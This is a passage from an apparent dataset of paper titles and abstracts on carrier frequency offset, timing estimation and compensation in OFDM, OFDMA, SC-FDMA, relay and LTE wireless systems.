They show that the proposed procedure completely eliminates the effect of the ICI on the channel estimate. They then extend their design of pilot sequences for realistic sparse channels. Both analytical and computer simulation results presented in this study demonstrate the superiority of the proposed approach over conventional methods for channel estimation in the presence of ICI. --- paper_title: Trade off between Frequency Diversity and Robustness to Carrier Frequency Offset in Uplink OFDMA System paper_content: In this paper, we investigate the effect of subcarrier allocation on the CFO for uplink OFDMA systems. Carriers are allocated to the users in order to get maximum throughput by making use of the channel frequency diversity. But in systems with CFO, while allocating the carriers to the users, attention must be paid to the ICI resulting due to CFO. In this paper we propose a carrier allocation scheme that provides a good compromise between the throughput maximization and robustness to the CFO induced ICI for systems with and without channel state information (CSI). --- paper_title: Frequency Offset Estimation in 3G LTE paper_content: 3G Long Term Evolution (LTE) technology aims at addressing the increasing demand for mobile multimedia services in high user density areas while maintaining good performance in extreme channel conditions such as high mobility of High Speed Trains. This paper focuses on the latter aspect and compares different algorithms for the uplink frequency offset estimation in LTE Base Stations (eNodeB). A frequency-domain maximum-likelihood based solution is proposed, taking profit of the available interference-free OFDM symbols de-mapped (or de-multiplexed) at the output of the FFT of an OFDMA multi-user receiver. It is shown to outperform the state-of-the-art CP correlation approach on both link-level performance and complexity aspects. --- paper_title: CFO Estimation and Compensation in SC-IFDMA Systems paper_content: Single carrier interleaved frequency division multiple access (SC-IFDMA) has been recently receiving much attention for uplink multiuser access in the next generation mobile systems because of its lower peak-to-average transmit power ratio (PAPR). In this paper, we investigate the effect of carrier frequency offset (CFO) on SC-IFDMA and propose a new low-complexity time domain linear CFO compensation (TD-LCC) scheme. The TD-LCC scheme can be combined with successive interference cancellation (SIC) to further improve the system performance. The combined method will be referred to as TD-CC-SIC. We shall study the use of user equipment (UE) ordering algorithms in our TD-CC-SIC scheme and propose both optimal and suboptimal ordering algorithms in the MMSE sense. We also analyze both the output SINR and the BER performance of the proposed TD-LCC and TD-CC-SIC schemes. Simulation results along with theoretical SINR and BER results will show that the proposed TD-LCC and TD-CC-SIC schemes greatly reduce the CFO effect on SC-IFDMA. We also propose a new blind CFO estimation scheme for SC-IFDMA systems when the numbers of subcarrier sets allocated to different UEs are not the same due to their traffic requirements. Compared to the conventional blind CFO estimation schemes, it is shown that by using a virtual UE concept, the proposed scheme does not have the CFO ambiguity problem, and in some cases can improve the throughput efficiency since it does not need to increase the length of cyclic prefix (CP). 
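The LTE entry above compares a frequency-domain maximum-likelihood estimator against the conventional cyclic-prefix correlation approach. A minimal sketch of that baseline is given below, assuming an idealised noise-free stream of OFDM symbols; the parameter names and frame layout are illustrative only.

import numpy as np

def cp_correlation_cfo(r, N, Ng, num_symbols):
    """Fractional CFO estimate (in subcarrier spacings) from cyclic-prefix
    correlation: each CP sample is a copy of the sample N positions later,
    rotated by 2*pi*eps."""
    acc = 0j
    for m in range(num_symbols):
        start = m * (N + Ng)
        cp = r[start:start + Ng]
        tail = r[start + N:start + N + Ng]
        acc += np.sum(np.conj(cp) * tail)
    return np.angle(acc) / (2 * np.pi)

# toy check: 10 OFDM symbols, N = 128, CP length 9, eps = 0.1
N, Ng, M, eps = 128, 9, 10, 0.1
blocks = []
for _ in range(M):
    x = np.fft.ifft(np.random.randn(N) + 1j * np.random.randn(N))
    blocks.append(np.r_[x[-Ng:], x])          # prepend cyclic prefix
s = np.concatenate(blocks)
r = s * np.exp(2j * np.pi * eps * np.arange(s.size) / N)
print(round(cp_correlation_cfo(r, N, Ng, M), 3))   # approximately 0.1 (noise-free)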
--- paper_title: Particle Filters for Joint Timing and Carrier Estimation: Improved Resampling Guidelines and Weighted Bayesian Cramer-Rao Bounds paper_content: This paper proposes a framework for joint blind timing and carrier offset estimation and data detection using a Sequential Importance Sampling (SIS) particle filter in Additive White Gaussian Noise (AWGN) channels. We assume baud rate sampling and model the intractable posterior probability distribution functions for sampling timing and carrier offset particles using beta distributions. To enable the SIS approach to estimate static synchronization parameters, we propose new resampling guidelines for dealing with the degeneracy problem and fine tuning the estimated values. We derive the Weighted Bayesian Cramer Rao Bound (WBCRB) for joint timing and carrier offset estimation, which takes into account the prior distribution of the estimation parameters and is an accurate lower bound for all considered Signal to Noise Ratio (SNR) values. Simulation results are presented to corroborate that the Mean Square Error (MSE) performance of the proposed algorithm is close to optimal at higher SNR values (above 20 dB). In addition, the bit error rate performance approaches that of the perfectly synchronized case for small unknown carrier offsets and any unknown timing offset. The advantage of our particle filter algorithm, compared to existing techniques, is that it can work for the full range acquisition of carrier offsets. --- paper_title: Analysis of the Frequency Offset Effect on Random Access Signals paper_content: Zadoff-Chu (ZC) sequences have been used as random access sequences in modern wireless communication systems, replacing the conventional pseudo-random-noise (PN) sequences due to their superior autocorrelation properties. An analytical framework quantifying the ZC sequence's performance and its fundamental limitation as a random access sequencein the presence of frequency offset between the transmitter and the receiver is introduced. We show that a ZC sequence's perfect autocorrelation properties can be severely impaired by the frequency offset thereby limiting the overall performance of the random access signals formed from these sequences. First, we derive the autocorrelation function of these random access sequences as a function of the frequency offset. Next, we introduce the concept of critical frequency offsets and the spectrum associated with a ZC sequence set to characterize the frequency offset properties of the random access signals. Finally, we demonstrate that the frequency offset immunity of a ZC sequence set can be controlled by shaping the spectrum of the ZC sequence set. --- paper_title: Practical analysis of codebook design and frequency offset estimation for virtual-multiple-input-multipleoutput systems paper_content: A virtual-multiple-input-multiple-output (MIMO) wireless system using the receiver-side cooperation with the compress-and-forward (CF) protocol, is an alternative to a point-to-point MIMO system, when a single receiver is not equipped with multiple antennas. It is evident that the practicality of CF cooperation will be greatly enhanced if an efficient source coding technique can be used at the relay. It is even more desirable that CF cooperation should not be unduly sensitive to carrier frequency offsets (CFOs). This study presents a practical study of these two issues. 
Firstly, codebook designs of the Voronoi vector quantisation (VQ) and the tree-structure VQ (TSVQ) to enable CF cooperation at the relay are described. A comparison in terms of the codebook design and encoding complexity is analysed. It is shown that the TSVQ is much simpler to design and operate, and can achieve a favourable performance-complexity tradeoff. Furthermore, this study demonstrates that CFO can lead to significant performance degradation for the virtual-MIMO system. To overcome this, it is proposed to maintain clock synchronisation and jointly estimate the CFO between the relay and the destination. This approach is shown to provide a significant performance improvement. --- paper_title: DSTBC based DF cooperative networks in the presence of timing and frequency offsets paper_content: In decode-and-forward (DF) relaying networks, the received signal at the destination may be affected by multiple impairments such as multiple channel gains, multiple timing offsets (MTOs), and multiple carrier frequency offsets (MCFOs). This paper proposes novel optimal and sub-optimal minimum mean-square error (MMSE) receiver designs at the destination node to detect the signal in the presence of these impairments. Distributed space-time block codes (DSTBCs) are used at the relays to achieve spatial diversity. The proposed sub-optimal receiver uses the estimated values of multiple channel gains, MTOs, and MCFOs, while the optimal receiver assumes perfect knowledge of these impairments at the destination and serves as a benchmark performance measure. To achieve robustness to estimation errors, the estimates' statistical properties are exploited at the destination. Simulation results show that the proposed optimal and sub-optimal MMSE compensation receivers achieve full diversity gain in the presence of channel and synchronization impairments in DSTBC based DF cooperative networks. --- paper_title: Comments on "Timing Estimation and Resynchronization for Amplify-and-Forward Communication Systems" paper_content: This comment first shows that the Cramer-Rao lower bound (CRLB) derivations in the above paper are not exact. In addition, contrary to the claims in the above paper, the assumptions of perfect timing offset estimation and matched-filtering at the relays affect the generality of the analytical results and cannot be justified. --- paper_title: Three-Stage Treatment of TX/RX IQ Imbalance and Channel with CFO for SC-FDE Systems paper_content: The direct-conversion transceiver has attracted increasing attention due to its low power consumption, but it suffers from serious IQ imbalance. In this paper, a three-stage treatment of transmitter/receiver (TX/RX) IQ imbalance and channel, in the presence of carrier frequency offset (CFO), is proposed for single-carrier frequency-domain-equalization (SC-FDE) systems. First, RX IQ imbalance and CFO are handled with a repetitive preamble. Second, joint responses of TX IQ imbalance and channel are estimated by designing another preamble via complementary Golay codes. Third, joint compensation of TX IQ imbalance and time-varying channel is conducted using the minimum-mean-square-error criterion. Simulations are presented to verify the proposed method, in terms of normalized mean square error for the estimation and bit error rate for the overall system.
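The three-stage SC-FDE entry above handles RX IQ imbalance and CFO with a repetitive preamble. A minimal sketch of the underlying repeated-preamble (Moose-type) CFO estimator, with the IQ-imbalance treatment omitted and all names illustrative, is given below.

import numpy as np

def repeated_preamble_cfo(r, L):
    """CFO estimate from a preamble made of two identical halves of length L.
    Without impairments, r[n+L] = r[n] * exp(j*2*pi*eps*L/N) with N = 2L,
    so the phase of the correlation gives eps (in subcarrier spacings)."""
    corr = np.sum(np.conj(r[:L]) * r[L:2 * L])
    return np.angle(corr) / np.pi          # 2*pi*eps*L/(2L) = pi*eps

# toy check
L, eps = 64, 0.3
half = (np.random.randn(L) + 1j * np.random.randn(L)) / np.sqrt(2)
preamble = np.r_[half, half]
r = preamble * np.exp(2j * np.pi * eps * np.arange(2 * L) / (2 * L))
print(round(repeated_preamble_cfo(r, L), 3))   # approximately 0.3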
--- paper_title: Receiver Design for Single-Frequency Networks with Fast-Varying Channels paper_content: SC-FDE (Single Carrier Frequency-Domain Equalization) modulations are known to be suitable for broadband wireless communications due to their robustness against severe time-dispersion effects and the relatively low envelope fluctuations of the transmitted signals. In this paper we consider the use of SC-FDE schemes in broadcast and multicast systems with SFN (Single Frequency Network) operation where we do not have perfect carrier synchronization between different transmitters. We study the impact of different CFOs (Carrier Frequency Offsets) between the local oscillator at the receiver and the local oscillator at each transmitter. We also propose receiver structures able to reduce the performance degradation caused by different CFOs at different transmitters. Our receivers can be regarded as a modified turbo equalizer implemented in the frequency domain, where a frequency offset compensation is performed before the iterative receiver. --- paper_title: Two-Dimensional ESPRIT-Like Shift-Invariant TOA Estimation Algorithm Using Multi-Band Chirp Signals Robust to Carrier Frequency Offset paper_content: In this paper, a two-dimensional (2-D) ESPRIT-like shift-invariant time-of-arrival (TOA) estimation (ELSITE) algorithm for multi-band chirp signals in the presence of a carrier frequency offset (CFO) is presented. For the shift invariant TOA estimation, the received signals must be transformed into a sinusoidal form. When the received signals are perturbed by a CFO, the frequency of the transformed sinusoids is also shifted such that the TOA estimation results are biased. The TOA-induced phase shift of the multi-band chirp signals is determined according to the parameters of the signal, while the CFO-induced phase shift is only proportional to the elapsed time. Based on this property, the proposed ELSITE algorithm achieves robust TOA estimation against CFO from the signal subspace of the stacked matrix. The root mean square error of the proposed algorithm was analyzed and verified in both an AWGN channel and a multipath channel with CFO via Monte-Carlo simulations. --- paper_title: ML Detection with Successive Group Interference Cancellation for Interleaved OFDMA Uplink paper_content: To mitigate the interference caused by multiple carrier frequency offsets (CFO) of distributed users, a maximum likelihood (ML) detection with group-wise successive interference cancellation (GSIC) is proposed for the interleaved Orthogonal Frequency Division Multiple Access (OFDMA) uplink. By exploiting the interference characteristics and the finite alphabet property of transmitted symbols, the proposed scheme first extracts the block diagonal of the frequency domain channel matrix and then employs ML detection via sphere decoding in each block. The decisions obtained from the detected blocks are used to mitigate the interference to the residual blocks. Numerical results show that the proposed scheme outperforms both the minimum mean square error (MMSE) detection and parallel interference cancellation (PIC) with affordable computational complexity. --- paper_title: Gain-Control-Free Blind Carrier Frequency Offset Acquisition for QAM Constellations paper_content: This paper introduces a novel blind frequency offset estimator for quadrature amplitude modulated (QAM) signals. Specifically, after a preliminary frequency compensation, the estimator is based on the π/2-folded phase histogram of the received data.
Then, the frequency offset estimate is taken as the frequency compensation value that minimizes the mean square error between the phase histogram measured on the received samples and the reference phase probability density function analytically calculated in the case of zero frequency offset. The π/2-folded phase histogram of the received data is here called the Constellation Phase Signature, since it definitively characterizes the phase distribution of signal samples belonging to a particular QAM constellation, and it has already been employed to develop a gain-control-free phase estimator that performs well for both square and cross constellations. The frequency offset estimator described here also has the remarkable property of being gain-control-free and, thus, it can be fruitfully employed in frequency acquisition stages. The asymptotic performance of the estimator has been analytically evaluated and assessed by numerical simulations. Theoretical analysis and numerical results show that the novel frequency offset estimator outperforms state-of-the-art estimators in a wide range of signal-to-noise ratio (SNR) values. --- paper_title: An efficient reduced-complexity two-stage differential sliding correlation approach for OFDM synchronization in the multipath channel paper_content: In this paper we propose a reduced-complexity two-stage time and frequency synchronization approach for OFDM systems, operating in multipath channels. The proposed approach exploits a single-symbol preamble with a repetitive structure, composed of two identical m-sequences. The first coarse stage, based on a sliding correlation, identifies the reduced uncertainty interval over which the second fine stage, based on a differential correlation, is performed. The combined use of the sliding correlation, characterized by its low complexity, and the differential correlation, which is much more complex but is carried out only a limited number of times, results in an overall reduced-complexity approach. For the time synchronization, the performance is evaluated in terms of correct detection rate of the frame start and the estimation variance. For the frequency synchronization, we focus on the fractional part of the frequency offset which is evaluated in terms of mean squared error. The simulation results prove that, compared to the considered benchmarks, the accuracy of the frame start detection and the fractional frequency offset estimation are greatly enhanced, even at very low SNRs. The proposed two-stage reduced-complexity approach is also compared to the single-stage brute-force approach, where differential correlation is exclusively used, to assess the performance degradation occasioned by the complexity reduction. --- paper_title: Optimal Training Sequences for Joint Timing Synchronization and Channel Estimation in Distributed Communication Networks paper_content: For distributed multi-user and multi-relay cooperative networks, the received signal may be affected by multiple timing offsets (MTOs) and multiple channels that need to be jointly estimated for successful decoding at the receiver. This paper addresses the design of optimal training sequences for efficient estimation of MTOs and multiple channel parameters. A new hybrid Cramer-Rao lower bound (HCRB) for joint estimation of MTOs and channels is derived. Subsequently, by minimizing the derived HCRB as a function of training sequences, three training sequence design guidelines are derived and according to these guidelines, two training sequences are proposed.
In order to show that the proposed design guidelines also improve estimation accuracy, the conditional Cramer-Rao lower bound (ECRB), which is a tighter lower bound on the estimation accuracy compared to the HCRB, is also derived. Numerical results show that the proposed training sequence design guidelines not only lower the HCRB, but they also lower the ECRB and the mean-square error of the proposed maximum a posteriori estimator. Moreover, extensive simulations demonstrate that application of the proposed training sequences significantly lowers the bit-error rate of multi-relay cooperative networks when compared to training sequences that violate these design guidelines. --- paper_title: Cooperative Space-Time Coded OFDM with Timing Errors and Carrier Frequency Offsets paper_content: The use of distributed space-time codes in cooperative communications promises to increase the rate and reliability of data transmission. These gains were mostly demonstrated for ideal scenarios, where all nodes are perfectly synchronized. Considering a cooperative uplink scenario with asynchronous nodes, the system suffers from two effects: timing errors and individual carrier frequency offsets. In effect, timing errors can completely cancel the advantages introduced by space-time codes, while individual carrier frequency offsets provide a great challenge to receivers. Indeed, frequency offsets are perceived as a time-variant channel (even if the individual links are static) in distributed cooperative communications. We show that using OFDM, space-time codes (STCs) become tolerant to timing errors. Channel estimation and tracking takes care of frequency offsets. Our simulations demonstrate that the bit error rate performance improves by an order of magnitude, when using a cooperative system design, which takes these two effects into account. --- paper_title: Compensation of multiple carrier frequency offsets in amplify-and-forward cooperative networks paper_content: In this paper, we propose a method to find an optimal correction value for multiple carrier frequency offsets (CFO) compensation, where two received signals have different path gains, in orthogonal frequency division multiplexing (OFDM) systems. Multiple CFOs occur when two spatially-separated transmitters are used to transmit the same signal simultaneously. In this case, the sidelobes of the subcarrier spectra of the undesired signals have similar magnitudes with opposite signs. Based on this fact, we propose a self-cancellation method for the intercarrier interference caused by multiple CFOs. In the proposed scheme, we compensate the multiple CFOs so that the signal-to-intercarrier-interference power ratio of the received signal is maximized, whereas in the ordinary methods only the signal power is maximized. --- paper_title: Improved Code-Aided Symbol Timing Recovery with Large Estimation Range for LDPC-Coded Systems paper_content: We present an improved code-aided symbol timing recovery method for low-density parity-check (LDPC) coded systems, which comprises two supporting algorithms: 1) a coarse estimation by utilizing a cost function, the mean absolute value of soft output of the LDPC decoder and 2) a fine estimation based on the Expectation-Maximization (EM) algorithm with a simple maximization step.
With low computational complexity, this proposed algorithm can achieve symbol timing recovery at low signal-to-noise ratio (SNR) with large estimation range, eliminating the biased results of many algorithms for large timing offset values. Simulation results for the case of 8-PSK system with (1944,972) LDPC code show that the root-mean-square-error (RMSE) performance of the proposed algorithm approaches the modified Cramer-Rao lower bound (MCRB) at Eb/No=4dB, and the bit-error-rate (BER) curve is very close to that of ideal synchronization. --- paper_title: Exact Signal Model and New Carrier Frequency Offset Compensation Scheme for OFDM paper_content: Carrier frequency offset (CFO) causes spectrum misalignment of transmitter and receiver filters. This misalignment leads to energy loss and distortion of received signal, resulting in performance degradation of the whole system. However, these issues are often overlooked by existing works. This paper presents an exact signal model for OFDM that takes into account the CFO-induced spectral misalignment and related aliasing effects. Incorporating these practical issues, we also propose a new preamble structure and a new CFO compensation approach to mitigate their negative effects. Theoretical analysis and simulation results substantiate the importance of the exact signal model and the advantage of the proposed CFO compensation scheme. --- paper_title: Optimum Pilot Sequences for Data-Aided Synchronization paper_content: We compute the pilot sequences that minimize the Cramer-Rao bound(CRB) for carrier phase offset, carrier frequency offset, and symbol timing offset estimation. If we require the pilot sequence to be drawn from a discrete set of constellation points, then the alternating sequence is the CRB-minimizing sequence. If we relax the constellation constraint and apply a total energy constraint, we obtain three different sequences that minimize the CRB for each of the synchronization parameters. We show that the maximum-likelihood (ML) estimator achieves the CRB for any of the sequences presented. We also explore the impact of using the pilot symbols in a preamble with unknown data symbols immediately following. The interference caused by the unknown data symbols reduces the performance of the ML estimator beyond an SNR threshold. --- paper_title: Low-Complexity Semiblind Multi-CFO Estimation and ICA-Based Equalization for CoMP OFDM Systems paper_content: We propose a low-complexity semiblind structure with multiple-carrier-frequency-offset (CFO) estimation and independent component analysis (ICA)-based equalization for multiuser coordinated multipoint (CoMP) orthogonal frequency-division-multiplexing (OFDM) systems. A short pilot is carefully designed for each user and has a twofold advantage. On the one hand, using the pilot structure, a complex multidimensional search for multiple CFOs is divided into a number of low-complexity monodimensional searches. On the other hand, the cross correlations between the transmitted and the received pilots are explored to allow simultaneous elimination of permutation ambiguity and quadrant ambiguity in the ICA equalized signals. 
Simulation results show that with a low training overhead of 1.6%, the proposed semiblind system not only outperforms the existing multi-CFO estimation schemes in terms of bit error rate (BER) and mean square error (MSE) of multi-CFO estimation but achieves a BER performance close to the ideal case with perfect channel state information (CSI) and no CFO at the receiver as well. --- paper_title: Low-complexity frequency offset and phase noise estimation for burst-mode digital transmission paper_content: The presence of a frequency offset (FO) and phase noise can cause severe performance degradation in digital communication systems. This work combines a simple FO estimation technique with a low-complexity phase noise estimation method, inspired by the space-alternating generalized expectation-maximization algorithm. Using a truncated discrete-cosine transform (DCT) expansion, the phase noise estimate is derived from the estimated DCT coefficients of the phase. A number of implementations of the proposed algorithm are discussed. Numerical results indicate that when estimating the FO from pilot symbols only, comparable performance can be reached as the computationally more complex case where the FO is updated iteratively, with small convergence time. The phase noise estimation step is well capable of compensating for the residual FO. For the considered scenario, performing FO compensation before iterative phase noise estimation yields a bit-error rate performance degradation close to the case where the FO is known. --- paper_title: Multiple carrier frequency offsets tracking in co-operative space-frequency block-coded orthogonal frequency division multiplexing systems paper_content: This study addresses the problem of carrier frequency offset (CFO) tracking in co-operative space-frequency block-coded orthogonal frequency division multiplexing (OFDM) systems with multiple CFOs. Considering that the inserted pilot tones are decayed by data subcarriers in the presence of multiple CFOs, a novel recursive residual CFO tracking (R-RCFOTr) algorithm is proposed. This method first removes CFO-induced inter-carrier interference from data subcarriers, and then updates the residual CFO (RCFO) estimation of each OFDM block recursively. When used in conjunction with a multiple CFOs estimator, the proposed R-RCFOTr can effectively mitigate the impacts from the multiple RCFOs with affordable complexity. Finally, simulation results are provided to validate the effectiveness of our proposed R-RCFOTr algorithm, which has performance close to that of perfect CFO estimation at moderate and high signal-to-noise ratio, and significantly outperforms conventional CFO tracking algorithm for large CFOs. --- paper_title: Accurate Pilot-Aided Sampling Frequency Offset Estimation Scheme for DRM Broadcasting Systems paper_content: In this paper, we propose an improved sampling frequency offset (SFO) estimation scheme for orthogonal frequency division multiplexing (OFDM) based digital radio mondiale (DRM) broadcasting systems. To demonstrate the performance of the proposed frequency estimator, analytical expression of the mean square error (MSE) is derived and performances are compared with conventional pilot-assisted estimators. Based on the simulation and theoretical analysis, our proposed estimator shows an improved estimation performance compared to the conventional estimators. 
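The DRM entry above estimates the sampling frequency offset (SFO) from pilot symbols. A common way to do this, sketched below under the assumption that residual CFO is negligible (a real implementation would also fit a common intercept term), is to least-squares fit the slope of the pilot phase rotation between consecutive OFDM symbols against the subcarrier index; the pilot layout and names are illustrative.

import numpy as np

def sfo_from_pilot_phase_slope(Y_prev, Y_curr, pilot_bins, N, Ng):
    """Least-squares estimate of the sampling frequency offset eta from the
    phase rotation of pilots between two consecutive OFDM symbols: the
    rotation grows linearly with the subcarrier index."""
    k = np.array(pilot_bins, dtype=float)
    dphi = np.angle(Y_curr[pilot_bins] * np.conj(Y_prev[pilot_bins]))
    # model: dphi ~ 2*pi*k*eta*(N+Ng)/N  (residual CFO ignored in this sketch)
    slope = np.sum(k * dphi) / np.sum(k * k)
    return slope * N / (2 * np.pi * (N + Ng))

# toy check: synthetic pilots rotated by an SFO of 50 ppm
N, Ng = 256, 32
pilot_bins = np.arange(4, 120, 8)
eta = 50e-6
Y_prev = np.exp(1j * np.random.uniform(0, 2 * np.pi, N))
rot = np.exp(2j * np.pi * pilot_bins * eta * (N + Ng) / N)
Y_curr = Y_prev.copy()
Y_curr[pilot_bins] = Y_prev[pilot_bins] * rot
print(round(sfo_from_pilot_phase_slope(Y_prev, Y_curr, pilot_bins, N, Ng) * 1e6, 1))  # ~ 50.0 ppm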
--- paper_title: Sequential Compensation of RF Impairments in OFDM Systems paper_content: Direct-conversion OFDM transceivers are seriously affected by front-end distortions like IQ imbalance and phase noise. Moreover, OFDM systems are sensitive to nonlinear distortions in power amplifiers and A/D converters, and to carrier frequency offset (CFO). We present a novel baseband compensation technique that compensates these main impairments in OFDM systems. Unlike compensation scheme that target a subset of impairments, our method jointly mitigates the effects of IQ imbalance, phase noise, carrier frequency offset and nonlinear distortion. Simulations of the proposed scheme with large levels of CFO, IQ imbalance and phase noise show an excellent performance in terms of bit error rate. --- paper_title: Suppression of ICI and MAI in SC-FDMA communication system with carrier frequency offsets paper_content: Similar to other orthogonal frequency division multiplexing (OFDM)-based systems, carrier frequency offset (CFO) is a challenging problem in uplink communications of single carrier frequency division multiple access (SC-FDMA) system. It must be noticed that CFO, which is mainly due to oscillator instability and/or Doppler shift, would generate inter carrier interference (ICI) as well as multi-access interference (MAI) to disturb the received signals and seriously degrade system performance. Frequency synchronization in uplink communications is difficult because different users always experience different CFOs and one user's CFO correction would misalign other users. In this paper, we proposed a suppression method to overcome the multi CFOs problem. To implement this algorithm, block type pilots would be exploited, which is also utilized in LTE uplink standard. The proposed algorithm is based on the following two assumptions. Firstly the proposed algorithm is applied in this scenario, where different users start to communicate with the base station at different symbol periods, and secondly, during the pilot block and the following data blocks, the CFO of each user is quasi static, which is feasible since CFO is slow varying. Compared with other interference suppression methods, the proposed method could directly estimate the interference components from the inverse pilot matrix, thus it does not need to do the CFO estimation. Further more, since block type pilots is a common pilot pattern in wireless communication system, this algorithm can be easily extended to other communication system. Simulation results show that the proposed suppression algorithm can significantly improved system performance. --- paper_title: A Novel Initial Cell Search Scheme in TD-LTE paper_content: In LTE system, in order to access the network, user equipment (UE) should detect the primary synchronization signal (PSS) and secondary synchronization signal (SSS) in downlink (DL) signal from the surrounding base stations (BS). This paper presents a novel initial cell search (ICS) scheme in TD-LTE system that contains two steps. In the first step, modified normalization based PSS detection is proposed to combat carrier frequency offset (CFO) and uplink (UL) interference. After CFO estimation and compensation, coherent SSS detection is adopted in frequency domain in the second period. Furthermore, in order to combat channel fading and noise, a method of flexible combination of PSS and SSS within several frames is proposed. 
Simulation results demonstrate that the proposed scheme is more robust and effective than conventional approaches in TDD systems. --- paper_title: Time and frequency offset estimation for distributed multiple-input multiple-output orthogonal frequency division multiplexing systems paper_content: This study addresses the problem of time and frequency offset estimation for distributed multiple-input multiple-output orthogonal frequency division multiplexing (MIMO-OFDM) systems in the case where the delays and the frequency offsets of all the transmitter/receiver pairs are different. A new training structure is designed and an efficient time and frequency offset estimator is proposed. With the symmetric conjugate property of the preamble, the proposed timing metric has an impulse shape, making the time offset estimation accurate. Using the repetition property of the preamble, the proposed iterative frequency offset estimation algorithm can acquire high precision and a wide estimation range. To distinguish different transmit antennas, the preamble is weighted by pseudo-noise (PN) sequences with low cross-correlations. The analysis and the simulation results show that the proposed estimator offers accurate estimation of the different time delays and frequency offsets caused by the distributed transmitters of the MIMO-OFDM system, a situation that conventional estimators have so far been unable to handle. --- paper_title: Frequency Synchronization for the OFDMA Uplink Based on the Tile Structure of IEEE 802.16e paper_content: The multiple carrier frequency offsets (CFOs) of multiple users make frequency synchronization a challenging task in the orthogonal frequency-division multiple-access (OFDMA) uplink. In this paper, a computationally efficient iterative CFO estimation and compensation method for the OFDMA uplink with the generalized subcarrier allocation scheme (CAS) based on the tile structure of IEEE 802.16e is proposed. The proposed method only needs a few iteration cycles for its convergence. It greatly lowers the computational cost of the existing methods and can achieve better CFO estimation and compensation performance. --- paper_title: Multiple Carrier Frequency Offset and Channel Estimation for Distributed Relay Networks paper_content: Cooperative communication using decode and forward (DF)-based distributed relays is one important solution to achieve better connectivity and higher data rates in wireless fading channels. In distributed relay networks, each relay has an independent local oscillator which, when unsynchronized, results in the presence of multiple carrier frequency offsets (CFOs) at the destination. The maximum likelihood estimator (MLE) for estimating the multiple CFOs requires a two-dimensional grid search involving a matrix inversion for each search point. Thus, multiple CFO and channel estimation is computationally prohibitive and challenging in distributed relay networks. In this paper, we propose a simple estimator for multiple CFO and channel estimation at the destination by exploiting the fact that the relays receive information from a common source. Computer simulations show that the mean square error (MSE) performance of the proposed estimator is close to the Cramer-Rao lower bound for small carrier frequency synchronization errors at the relays. --- paper_title: Frequency Offset Estimation in I/Q Mismatched OFDM Receivers paper_content: The direct-conversion architecture is a promising solution for the design of low-cost mobile terminals.
However, it introduces extra RF impairments that greatly complicate fundamental receiver functions, including the synchronization task. This work deals with pilot-aided carrier frequency offset (CFO) recovery in an OFDM direct-conversion receiver plagued by frequency-selective I/Q imbalance. Since the exact maximum likelihood (ML) solution of this problem requires a complete search over the frequency uncertainty range, we propose a simpler scheme that dispenses with any peak-search procedure. Numerical simulations and theoretical analysis indicate that the proposed scheme attains the relevant Cramer-Rao bound at all signal-to-noise ratios of practical interest. --- paper_title: Joint estimation of I/Q imbalance, CFO and channel response for MIMO OFDM systems paper_content: In this paper, we study the joint estimation of in-phase and quadrature-phase (I/Q) imbalance, carrier frequency offset (CFO), and channel response for multiple-input multiple-output (MIMO) orthogonal frequency division multiplexing (OFDM) systems using training sequences. A new concept called channel residual energy (CRE) is introduced. We show that by minimizing the CRE, we can jointly estimate the I/Q imbalance and CFO without knowing the channel response. The proposed method needs only one OFDM block for training and the training symbols can be arbitrary. Moreover, when the training block consists of two repeated sequences, a low-complexity two-step approach is proposed to solve the joint estimation problem. Simulation results show that the mean-squared error (MSE) of the proposed method is close to the Cramer-Rao bound (CRB). --- paper_title: Low-complexity joint regularised equalisation and carrier frequency offsets compensation scheme for single-carrier frequency division multiple access system paper_content: The conventional zero-forcing receiver does not operate satisfactorily in interference-limited environments because of its noise amplification, while the minimum mean-square error receiver requires the statistics of the transmitted data and the additive noise; the potential of the regularised receiver is therefore investigated in this study to cope with these problems. The authors introduce an efficient low-complexity joint regularised equalisation and carrier frequency offset compensation (LJREC) scheme for the single-carrier frequency division multiple access system. The proposed LJREC scheme avoids the noise amplification problem and the estimation of the signal-to-noise ratio and the interference matrices of other users. The obtained simulation results show that the proposed scheme enhances the system performance with lower complexity and sufficient robustness to estimation errors. --- paper_title: Carrier Frequency Offset Estimation in OFDMA using Digital Filtering paper_content: This letter deals with the frequency synchronization problem in the uplink of OFDMA communications systems with interleaved or generalized subcarrier allocation. An algorithm to estimate the carrier frequency offsets (CFOs) of all the active users is presented. The estimator relies upon finding the zeros of a suitably designed filter. The design of the filter boils down to the solution of a least squares (LS) problem and thus entails relatively low complexity. While under low subcarrier load conditions the estimation root mean squared error (RMSE) is higher than that of other existing methods, under heavy or full load the estimator achieves comparable and even superior performance.
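To make the idea behind regularised one-tap frequency-domain equalisation concrete, here is a minimal sketch; it is my own illustration under assumed notation, not the cited LJREC scheme. A ridge term delta bounds the noise amplification that a pure zero-forcing inverse would suffer on deeply faded subcarriers.

```python
import numpy as np

def regularised_one_tap_fde(Y, H, delta):
    """Per-subcarrier equalisation X_hat[k] = conj(H[k]) Y[k] / (|H[k]|^2 + delta).
    delta = 0 gives zero-forcing; delta near the noise variance approximates MMSE."""
    return np.conj(H) * Y / (np.abs(H) ** 2 + delta)

# Toy usage: the deep fade on the second subcarrier is not blown up when delta > 0.
H = np.array([1.0, 0.05 + 0.05j, 0.8 - 0.3j])          # assumed channel responses
X = np.array([1 + 1j, 1 - 1j, -1 + 1j]) / np.sqrt(2)   # QPSK symbols
noise = np.array([0.02 - 0.01j, 0.03 + 0.02j, -0.01j])
Y = H * X + noise
print(np.round(regularised_one_tap_fde(Y, H, delta=0.0), 2))   # zero-forcing
print(np.round(regularised_one_tap_fde(Y, H, delta=0.05), 2))  # regularised
```

The design choice is the usual bias/variance trade-off: a larger delta suppresses noise enhancement on weak subcarriers at the cost of a small bias on strong ones.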
